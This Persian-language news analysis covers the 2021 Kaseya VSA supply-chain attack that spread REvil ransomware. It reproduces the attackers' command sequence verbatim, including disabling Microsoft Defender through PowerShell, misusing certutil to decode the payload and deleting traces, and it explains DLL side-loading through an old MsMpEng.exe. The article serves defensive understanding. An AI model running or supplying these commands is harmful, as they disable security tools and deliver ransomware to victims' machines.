نماد سایت اتاق خبر شبکه گستر

نفوذ به Kaseya VSA، نمونه‌ای دیگر از حملات زنجیره تأمین

جمعه، 11 تیر ماه، منابع خبری از فلج شدن شرکت‌های مختلف در نتیجه آلودگی به باج‌افزار REvil خبر دادند. همه این قربانیان در یک چیز مشترک بودند و آن استفاده مستقیم یا غیرمستقیم از سرورهای Kaseya VSA بود.

در این گزارش که با همکاری شرکت مهندسی شبکه گستر و مرکز مدیریت راهبردی افتای ریاست جمهوری تهیه گردیده روش اجرای این حمله مورد بررسی و تحلیل قرار گرفته است.

کاسیا (Kaseya, Ltd) شرکتی فعال در حوزه راهکارهای فناوری اطلاعات است که در 10 کشور جهان حضور مستقیم دارد. به گفته کاسیا بیش از 40 هزار مشتری، حداقل از یکی از محصولات این شرکت استفاده می‌کنند. VSA از جمله محصولات این شرکت برای مدیریت از راه دوره شبکه‌ها و نقاط پایانی است. یکی از کاربردهای اصلی VSA فراهم کردن بستر برای مدیریت نقاط پایانی مشتریان شرکت‌های ارائه‌دهنده خدمات پشتیبانی (Managed Service Provider – به اختصار MSP) است. این شرکت‌ها می‌توانند با استفاده از VSA سرورها و ایستگاه‌های کاری مشتریان خود را که نرم‌افزار Kaseya Agent بر روی آنها نصب شده است مدیریت کنند.

مدیر عامل کاسیا در روز جمعه، از اجرای یک حمله بالقوه بر ضد تعداد محدودی از مشتریان VSA خبر داد. همزمان آمار شناسایی REvil و بعضاً آلودگی دستگاه‌ها به این باج‌افزار در بازه‌ای یک ساعته به‌شدت افزایش یافته بود.

 

 

کاسیا از مشتریان خود خواست برای احتیاط چه بیشتر فوراً نسبت به خاموش کردن سرورهای VSA خود اقدام کنند. اندکی بعد نیز این شرکت سرورهای رایانش ابری VSA و مرکز داده خود را از دسترس خارج کرد.

دو روز بعد، در 13 تیر ماه، کاسیا رسماً اعلام کرد که قربانی یک حمله پیچیده شده است.

برخی منابع گزارش کرده‌اند که حداقل 30 شرکت و به تبع آن بسیاری از مشتریان آنها از این حمله گسترده متأثر شده‌اند.

بررسی‌های بعدی نشان داد مهاجمان پس از سوءاستفاده از یک آسیب‌پذیری روز-صفر در VSA اقدام به توزیع کد مخرب بر روی دستگاه‌های متصل به این سرورها و آلوده کردن آنها به باج‌افزار REvil کرده بودند. شدت و دامنه این حمله به حدی بود که برخی شرکت‌های امنیتی اقدام به انتشار هشدار و توصیه‌نامه امنیتی ویژه برای مشتریان خود کردند. برخی از این توصیه‌نامه‌ها در لینک‌های زیر قابل مطالعه است:

REvil باج‌افزاری است که در قالب خدمات موسوم به RaaS به سایر مهاجمان فروخته می‌شود.

در خدمات “باج‌افزار به‌عنوان سرویس” (Ransomware-as-a-Service) – به اختصار RaaS -، صاحب باج‌افزار، فایل مخرب را به‌عنوان یک خدمت به متقاضی اجاره می‌دهد. متقاضی که ممکن است در برنامه‌نویسی تخصصی نداشته باشد تنها وظیفه انتشار باج‌افزار را بر عهده دارد. در نهایت بخشی از مبلغ اخاذی شده از قربانی به نویسنده باج‌افزار و بخشی دیگر به متقاضی سرویس می‌رسد.

طی یک سال گذشته پس از انهدام یا خروج خودخواسته گردانندگان RaaS و چندین باج افزار دیگر، REvil بیش از قبل مورد استقبال تبهکاران سایبری قرار گرفته است.

مهاجمان حمله اخیر در مطلبی مدعی شده‌اند که بیش از یک میلیون دستگاه را به REvil آلوده کرده‌اند. همچنین اظهار داشته‌اند که در صورت دریافت مبلغ 70 میلیون دلار، اقدام به انتشار یک ابزار رمزگشای مشترک خواهند کرد!

همان‌طور که اشاره شد مهاجمان از طریق یک آسیب‌پذیری روز-صفر در سرور VSA که بعداً به آن شناسه CVE-2021–30116 تخصیص داده شد موفق به اجرای این حمله گسترده شده‌اند.

در آن حمله، مهاجمان پس از در اختیار گرفتن کنترل VSA، دسترسی راهبر به آن را قطع کردند. سپس با ایجاد یک فرمان به‌روزرسانی جعلی با عنوان “Kaseya VSA Agent Hot-fix” فایل مخرب agent.crt را در مسیر پیش‌فرضی که بر اساس تنظیمات VSA تعیین می‌شود بر روی تمامی دستگاه‌های متصل کپی کردند.

نکته قابل توجه این که کاسیا در این مقاله فنی به مشتریان خود توصیه کرده که مسیرهای مورد استفاده توسط VSA از جمله مسیر مذکور را مستثنی کنند.

 

بنابراین فایل agent.crt بدون هیچ‌گونه مزاحمتی از جانب برنامه امنیتی نصب شده بر روی دستگاه (به دلیل مستثنی شدن مسیر) ذخیره و اجرا می‌شود.

با اجرای فایل مذکور مجموعه فرامینی فراخوانی می‌شوند که در تصویر زیر نمایش داده شده است.

 

 

اما این فرامین چه می‌کنند؟

 

ping 127.0.0.1 -n 5693 > nul

این فرمان در حقیقت نقش یک تایمر را ایفا می‌کند. استفاده از پارامتر -n موجب می‌شود تا Ping.exe تعداد 5693 درخواست Echo را به دستگاهی که بر روی آن اجرا شده (Localhost) ارسال کند. به عبارت دیگر این فرمان را می‌توان نوعی تابع “خواب” (Sleep Function) در نظر گرفت که برای 5693 ثانیه (تقریبا 94 دقیقه) اجرای فرمان بعدی را به تعویق می‌اندازد. به نظر می‌رسد فرایند انتخاب مقدار به‌صورت تصادفی صورت گرفته و لزوماً در تمامی نمونه‌ها، عدد 5693 نیست.

 

 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

در این مرحله با بکارگیری پروسه معتبر PowerShell تلاش می‌شود تا قابلیت‌های مختلف ضدویروس پیش‌فرض سیستم عامل Windows یعنی Microsoft Defender غیرغعال شود. بدین‌ترتیب ضدویروس مذکور در برابر هر گونه فایل مخرب بی‌اثر می‌شود.

 

 

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

این بخش از فرمان اقدام به ایجاد رونوشتی از فایل certutil.exe در پوشه‌ای متفاوت از مسیر اصلی می‌کند. certutil.exe فایل معتبری است که در مسیر Windows\System32 قرار دارد. رونوشت، با نامی یکسان در مسیر زیر کپی می شود:

C:\Windows\cert.exe

 

 

echo %RANDOM% >> C:\Windows\cert.exe

فرمان بالا یک عدد 5 رقمی را به انتهای فایل cert.exe اضافه می‌کند. احتمالاً با این هدف که با تغییر امضای فایل، آن دسته از محصولات امنیتی را که سوءاستفاده از cert.exe را رصد و کنترل می‌کنند، دور بزند.

 

 

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe

این بخش از فرمان فایل مخرب agent.cert را توسط cert.exe کدگشایی کرده و در قالب فایل agent.exe در مسیر c:\kworking ذخیره می‌کند.

در این فرایند از یک گواهینامه سرقت یا جعل شده با عنوان PB03 TRANSPORT LTD استفاده می‌شود.

 

 

 

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe

این فرمان موجب حذف agent.crt و نسخه کپی شده cert.exe می‌شود.

 

 

c:\kworking\agent.exe

در نهایت agent.exe توسط Agentmon.exe که یکی از فایل‌های معتبر VSA است، با سطح دسترسی System اجرا شده و عملیات باج‌افزار آغاز می‌شود.

 

در این مرحله agent.exe فایل MsMpEng.exe را کپی می‌کند. MsMpEng.exe یک فایل اجرایی مربوط به نسخه قدیمی (4.5.218.0) از نرم‌افزار Windows Defender است. مایکروسافت این نسخه را مدتها پیش منقضی کرده بود.

 

 

این نسخه از MsMpEng.exe به حملات موسوم به Side-loading آسیب‌پذیر است و قبلاً نیز در مواردی مورد بهره‌جویی مهاجمان قرار گرفته بود. در این حمله نیز با سوءاستفاده از آسیب‌پذیری مذکور، agent.exe یک فایل مخرب با نام mpsvc.dll را در کنار MsMpEng.exe ایجاد می‌کند. در ادامه agent.exe اقدام به اجرای MsMpEng.exe و در نتیجه فراخوانی غیرمستقیم فایل مخرب mpsvc.dll در حافظه متعلق به MsMpEng.exe می‌کند.

mpsvc.dll نیز حاوی گواهینامه PB03 TRANSPORT LTD است که به agent.exe هم اعمال شده بود.

از این لحظه، کد مخرب mpsvc.dll فرایند عادی پروسه MsMpEng.exe را در اختیار می‌گیرد.

به‌محض آن که dll در حافظه فراخوانی می‌شود بدافزار آن را از روی دیسک حذف می‌کند.

اکنون MsMpEng.exe که در تسخیر کامل mpsvc.dll ‌است رمزگذاری فایل‌های ذخیره شده بر روی دیسک سخت، حافظه‌های جداشدنی و درایوهای شبکه‌ای را آغاز می‌کند. با توجه به معتبر بودن MsMpEng.exe عملاً محصولات امنیتی آن را پروسه‌ای مجاز تلقی کرده و مانع از اجرای این امور نمی‌شوند.

با اجرای فرمان زیر هم قابلیت Network Discovery در تنظیمات فایروال مجاز می‌شود:

netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes

فرایند رمزگذاری REvil با الگوریتم in-place صورت می‌پذیرد. در این الگوریتم، فایل‌های رمزگذاری شده در همان سکتورهایی ذخیره می‌شوند که فایل‌های اصلی (غیررمزشده) در آنجا بوده‌اند. لذا بازگردانی آنها از طریق ابزارهای بازیابی داده غیرممکن می‌شود.

در نهایت نیز تصویر پس‌زمینه دستگاه به‌صورت زیر در می‌آید.

 

 

حمله به VSA را می‌توان یکی از موفق ترین حملات موسوم به زنجیره تأمین (Supply Chain Attack) دانست. حمله‌ای که در آن مهاجمان با سوءاستفاده از یک نرم افزار معتبر نصب شده بر روی دستگاه، به‌سرعت و به‌سادگی و بدون هیچ‌گونه مزاحمتی از جانب برنامه‌های امنیتی آنها را به باج‌افزار آلوده کردند.

نشانه های آلودگی این حمله در مسیر زیر قابل دسترس است:

موارد زیر از جمله درس‌هایی است که می‌توان از این حمله گسترده آموخت:

به یاد داشته باشیم که اتکای صرف به محصولات امنیتی نمی‌تواند سازمان را از گزند تمامی تهدیدات از جمله حملات هدفمند سایبری حفظ کند.

 

منابع:

 

خروج از نسخه موبایل